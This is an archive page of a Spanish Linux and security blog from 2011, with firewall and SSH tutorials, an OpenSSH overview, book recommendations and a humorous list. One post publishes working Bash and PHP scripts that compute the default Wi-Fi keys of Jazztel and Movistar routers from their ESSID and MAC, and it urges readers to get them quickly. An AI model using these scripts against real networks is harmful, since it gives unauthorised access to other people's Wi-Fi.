Archivo

Archive for 27 febrero 2011

Creando un firewall en Linux (Planificando y configurando – I Parte)


En este primer vídeo dividido en 2 os dejo una segunda parte de la configuracion, siguiendo un esquema de las maquinas virtuales necesarias para hacer un firewall. Una de ellas hace de firewall (un linux) y otras dos serán dos subredes (una linux y un XP)…CONTINUARA

Esto no lo verás en la Televisión: “Pitada a Sinde”


Visto en Meneame y UbuntuLife

Routers WIFI al descubierto

09/02/2011 4 comentarios

Los usuarios de jazztel y movistar que no hayan cambiado el nombre (ESSID) de sus wifis pueden ir pensando en hacerlo: El algoritmo ha sido descifrado. Por lo visto, el que sacó a la luz el algoritmo fue elvecinoo en este hilo de lampiweb En http://kz.ath.cx/wlan/ (entre otros mas que alojan los algoritmos) se ingresa nombre y la MAC del router y te la clava.

Algunos ejemplos:

En BASH:

#!/bin/bash                                                                     

echo CalcWLAN by a.s.r                                                          

if [ $# -ne 2 ]
then
        echo "Usage: $0 <ESSID> <BSSID>"
        echo
        echo "Example: $0 WLAN_C58D 64:68:0C:C5:C5:90"
        exit 1
fi                                                                              

HEAD=$(echo -n "$1" | tr 'a-z' 'A-Z' | cut -d_ -f2)
BSSID=$(echo -n "$2" | tr 'a-z' 'A-Z' | tr -d)
BSSIDP=$(echo -n "$BSSID" | cut -c-8)
KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)                  

echo "La puta clave es $KEY"

En PHP:

// THIS CODE IS UNDER THE PUBLIC DOMAIN

function right($string, $chars)
{
	return substr($string, strlen($string) - $chars, $chars);
}

if (isset($_POST['essid']) && isset($_POST['bssid']))
{
	$bssid = preg_replace('/:/', '', strtoupper(trim($_POST['bssid'])));

	if (strlen($bssid) != 12)
	{
		die('Mete bien la MAC, buen hombre.');
	}

	$essid = strtoupper(trim($_POST['essid']));
	$_ssid = substr($bssid, 0, 8).right($essid, 4);

	die(substr(md5('bcgbghgg'.$_ssid.$bssid), 0, 20));
}

Daos prisa antes de que cierren las webs donde se alojan los fuentes.

Protocolo SSH (5 prácticas sencillas)

08/02/2011 1 comentario

En estos tutoriales que aquí comienzo, os dejo la primera practica, en la que creo una conexión sencilla a través del protocolo SSH….

En estos segundo tutorial que aquí os dejo, en la que creo una conexión sencilla a través del protocolo SSH pero usando un par de claves públicas/privadas…

En este tercer tutorial que aquí os dejo, en la que creo una conexión sencilla a través del protocolo SSH pero usando el servidor X incluido en Linux…

En este cuarto tutorial que aquí os dejo, en la que creo una conexión sencilla a través del protocolo SSH pero usando el servidor Telnet, que es del todo menos seguro y su uso en Wireshark creando un túnel con SSH para volverlo seguro…

En este ultimo y quinto tutorial que aquí os dejo, en la que creo una conexión sencilla a través del protocolo SSH pero usando a un tercero que nos dará acceso a internet, el cual nosotros no poseemos directamente…

Espero que os hayan sido de ayuda…un saludo

OpenSSH (Introducción)

08/02/2011 1 comentario

SSH (Secure SHell, en español: intérprete de órdenes segura) es el nombre de un protocolo y del programa que lo implementa, y sirve para acceder a máquinas remotas a través de una red. Permite manejar por completo la computadora mediante un intérprete de comandos, y también puede redirigir el tráfico de X para poder ejecutar programas gráficos si tenemos un Servidor X (en sistemas UnixWindows) corriendo.

Además de la conexión a otros dispositivos, SSH nos permite copiar datos de forma segura (tanto ficheros sueltos como simular sesiones FTP cifradas), gestionar claves RSA para no escribir claves al conectar a los dispositivos y pasar los datos de cualquier otra aplicación por un canal seguro tunelizado mediante SSH.

OpenSSH (Open Secure Shell) es un conjunto de aplicaciones que permiten realizar comunicaciones cifradas a través de una red, usando el protocolo SSH. Fue creado como una alternativa libre y abierta al programa Secure Shell, que es software propietario. El proyecto está liderado por Theo de Raadt, residente en Calgary.

La suite OpenSSH incluye:

  • ssh, reemplaza a rlogintelnet para permitir shell el acceso remoto a otra máquina. ssh tero@ejemplo.com
  • scp, reemplaza a rcp scp tero@ejemplo.com:~/archivo .
  • sftp, reemplaza a ftp para copiar archivos entre dos computadoras sftp tero@ejemplo.com
  • sshd, el servidor demonio SSH sshd
  • ssh-keygen, una herramienta para inspeccionar y generar claves RSADSA que son usadas para la autenticación del cliente o usuario.
  • ssh-agent y ssh-add, herramientas para autenticarse de manera mas fácil, manteniendo las claves listas para no tener que volver a introducir la frase de acceso cada vez que utilice la clave.
  • ssh-keyscan, que escanea una lista de clientes y recolecta sus claves públicas.

El servidor OpenSSH puede autenticar a los usuarios mediante todos los métodos estándar del protocolo ssh

Libros de recomendada lectura…

06/02/2011 5 comentarios

Estos libros que dejo para descarga espero me sean muy útiles en el curso de Seguridad que estoy recibiendo y de paso os los dejo a vosotros para su lectura recomendada…

  1. Seguridad física…algo tan importante en una empresa como lo sería la seguridad informática del software.
  2. Documentación sobre iptables-firewall de Linux. Importante a la hora de protegeros en cualquier sistema Linux hoy en dia.
  3. Guía de Seguridad del Administrador de Linux, traducido y muy recomendable para cualquier administrador de sistemas y seguridad en Linux.
  4. Introducción al SSH versión 0.2, tema muy importante, sobre todo en seguridad.
  5. Análisis de seguridad de la familia de protocolos TCP/IP y sus servicios asociados, algo sobre Hacking, pero sobre todo como protegernos de ese protocolo y su familia.

Un saludo. Mike Mars.

 

 

Los 10 mandamientos…

06/02/2011 2 comentarios

Los Mandamientos de Linux

Y habla Dios todo esto, diciendo:
"Yo soy Linux, tu Dios, que te he sacado de la tierra de Microsoft, de la casa de la servidumbre"
  • No tendrás otro Dios que a mí, pero te dejo coquetear con cualquier sistema que funcione.
  • No instalarás sistemas operativos monopolistas, ni te prosternarás ante ellos, y no los servirás, porque soy un Dios celoso…
  • No utilizaras software propietario.
  • Navegarás por páginas que soporten Lynx
  • No tomarás el nombre de Linux en vano
  • Santificarás los demonios y las fiestas jugando al Cibermús.
  • Honrarás a los profetas de Linux, a aquellos que contribuyen.
  • Cerrarás tu puerto de finger. No saldrás a la red como root.
  • No adorarás ídolos en forma de tarjetas multipuerto a 9600 baudios.
  • El primer juego que ejecutes será el Xbill, y Sí Matarás.
  • Sí adulterarás, y te harás compatible con cuantos sistemas se dejen.
  • Realizarás ingeniería inversa.
  • No levantarás falso testimonio contra el kernel. No tiene bugs.
Estos mandamientos se resumen en dos:

Amarás a Linux sobre todas las cosas y al OpenSource como a tí mismo.

Origen: desconocido. Autor: desconocido. Obtenido de Fidonet (R34.LINUX)

Etiquetas: , ,
A %d blogueros les gusta esto: